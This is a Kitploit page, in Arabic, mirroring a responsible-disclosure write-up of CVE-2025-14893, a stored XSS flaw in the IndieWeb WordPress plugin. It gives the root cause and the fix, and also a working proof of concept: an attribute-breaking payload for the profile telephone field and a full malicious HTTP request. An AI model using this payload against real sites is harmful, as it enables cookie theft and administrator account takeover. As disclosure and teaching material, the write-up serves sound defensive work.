Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-14893 — ثغرة Cross-Site Scripting (XSS) مخزنة ومصادق عليها في إضافة IndieWeb لووردبريس | Kitploit
أدوات/GitHubGitHub/d3kc4rt1/cve-2025-14893
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالأوراق والأبحاثالتعلم والتعليم
GitHubd3kc4rt1/cve-2025-14893

CVE-2025-14893

ثغرة Cross-Site Scripting (XSS) مخزنة ومصادق عليها في إضافة IndieWeb لووردبريس

عرض المستودع
1منذ 5 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-14893: ثغرة تخزينية للبرمجة النصية عبر المواقع (XSS) مع مصادقة في إضافة IndieWeb لووردبريس

تنويه: تم إنشاء هذا المستودع لأغراض تعليمية والإفصاح الأخلاقي فقط. تم الإبلاغ عن الثغرة بشكل مسؤول إلى البائع وتم إصلاحها. لا تستخدم هذه المعلومات لاستغلال الأنظمة دون إذن مناسب.

ملخص تنفيذي

تم اكتشاف ثغرة برمجة نصية عبر المواقع (XSS) تخزينية في إضافة IndieWeb لووردبريس (الإصدارات <= 4.0.5). تسمح هذه الثغرة للمهاجمين الموثّقين الذين لديهم صلاحيات مؤلف (Author) أو أعلى بحقن نصوص جافا سكريبت ضارة في حقل "الهاتف" (Telephone) الخاص بملفهم الشخصي.

عند عرض "ودجة بطاقة اتصال الملف الشخصي للمؤلف (Author Profile H-Card Widget)" في الواجهة الأمامية، يتم عرض النص المحقون دون تعقيم مناسب. إذا قام مستخدم ذو صلاحيات عالية، مثل المدير (Administrator)، بالنقر على الرابط المُتلاعب به، يتم تنفيذ النص البرمجي في سياق متصفحه. يمكن أن يؤدي ذلك إلى اختطاف الجلسة، وإجراء إجراءات إدارية غير مصرح بها، والاستيلاء الكامل على الحساب (ATO).

نظرة عامة على الثغرة

  • CVE ID: CVE-2025-14893
  • المنتج: IndieWeb (إضافة ووردبريس)
  • الإصدارات المتأثرة: <= 4.0.5
  • نوع الثغرة: برمجة نصية عبر المواقع تخزينية (Stored XSS) (CWE-79)
  • الصلاحيات المطلوبة: موثّق (بصلاحية مؤلف فما فوق)

تحليل فني معمق والسبب الجذري

المشكلة الأساسية تكمن في المعالجة غير الآمنة للبيانات الوصفية للمستخدم داخل نظام القوالب الخاص بالإضافة، وتحديدًا الفشل في استخدام دوال الهروب (escaping functions) المدمجة في ووردبريس.

الملف المعرض للخطر: templates/h-card.php (السطر 27)

root@kitploit:~
<a class="p-tel tel" href="tel:<?php echo $user->get( 'tel' ); ?>"><?php echo $user->get( 'tel' ); ?></a>

الخلل: تقوم الإضافة بإخراج البيانات الوصفية tel للمستخدم مباشرة داخل سمة href لـ HTML باستخدام echo دون تغليفها بـ esc_attr(). يسمح هذا للمهاجم بتوفير سلسلة محرفة تتضمن علامة اقتباس مزدوجة (") لإغلاق سمة href مبكرًا، متبوعة بسمات HTML عشوائية (مثل style أو onclick).

التأثير التجاري

  • الاستيلاء على الحساب (ATO): إذا تفاعل المدير مع العنصر المُتلاعب به، يمكن لجافا سكريبت المهاجم سرقة ملفات تعريف الارتباط للجلسة أو تنفيذ طلبات AJAX إدارية، مما يمنح المهاجم السيطرة الكاملة على موقع ووردبريس.
  • ضرر السمعة: يمكن للمهاجم تعديل العناصر المرئية للصفحة (تشويه) أو إعادة توجيه الزوار الشرعيين إلى مواقع طرف ثالث ضارة.

إثبات المفهوم (PoC)

المتطلبات الأساسية

  1. تثبيت ووردبريس مع تفعيل إضافة IndieWeb <= 4.0.5.
  2. حساب مهاجم بدور مؤلف (Author) .
  3. إضافة "ودجة بطاقة اتصال الملف الشخصي للمؤلف" إلى منطقة أمامية مرئية (مثل الشريط الجانبي).

خطوات الاستغلال

  1. تسجيل الدخول إلى لوحة تحكم ووردبريس كمستخدم مؤلف.
  2. الانتقال إلى الملف الشخصي (/wp-admin/profile.php).
  3. التمرير لأسفل إلى حقل الهاتف (Telephone) .
  4. حقن الحمولة التالية (التي تخرج من سمة href):
    root@kitploit:~
    Click_Me" style="background:#ff4444; color:white; padding:5px; display:inline-block;" onclick="alert(document.cookie);
    
  5. النقر على تحديث الملف الشخصي (Update Profile) .
  6. خطوة حاسمة: إنشاء ونشر مقال جديد. يتم عرض الودجة المعرضة للخطر فقط على صفحات المقالات الفردية (is_single()) لعرض معلومات المؤلف.
  7. التشغيل: عندما يزور المدير المقال المنشور على الواجهة الأمامية وينقر على زر الهاتف المُصمم حديثًا "Click_Me"، يتم تنفيذ حمولة XSS (تنبيه بملف تعريف ارتباط الجلسة).

مثال على طلب HTTP ضار (تحديث الملف الشخصي)

root@kitploit:~
POST /wp-admin/profile.php HTTP/1.1
Host: TARGET
Content-Type: application/x-www-form-urlencoded
Cookie: [Author_Session_Cookies]

_wpnonce=[valid_nonce]&_wp_http_referer=%2Fwp-admin%2Fprofile.php&from=profile&checkuser_id=2&color-nonce=[nonce]&admin_color=fresh&admin_bar_front=1&first_name=&last_name=&nickname=attacker&display_name=attacker&email=attacker%40example.com&tel=Click_Me"%20style%3D"background%3A%23ff4444%3B%20color%3Awhite%3B%20padding%3A5px%3B%20display%3Ainline-block%3B"%20onclick%3D"alert(document.cookie)%3B&action=update&user_id=2&submit=Update+Profile

المعالجة

لإصلاح هذه الثغرة، يجب على مطوري الإضافة هروب المخرجات بشكل صحيح باستخدام دوال esc_attr() و esc_html() الخاصة بووردبريس.

مثال للكود المُصحح:

root@kitploit:~
<a class="p-tel tel" href="tel:<?php echo esc_attr( $user->get( 'tel' ) ); ?>"><?php echo esc_html( $user->get( 'tel' ) ); ?></a>

الجدول الزمني

  • التاريخ (2026-03-03): الإبلاغ إلى Wordfence.
  • التاريخ (2026-03-20): تم إصلاح الثغرة / الإفصاح العام.

المراجع والإشادات

  • قاعدة بيانات ثغرات Wordfence
  • CVE-2025-14893 على NVD
  • إضافة IndieWeb على WordPress.org
تنزيل الأداة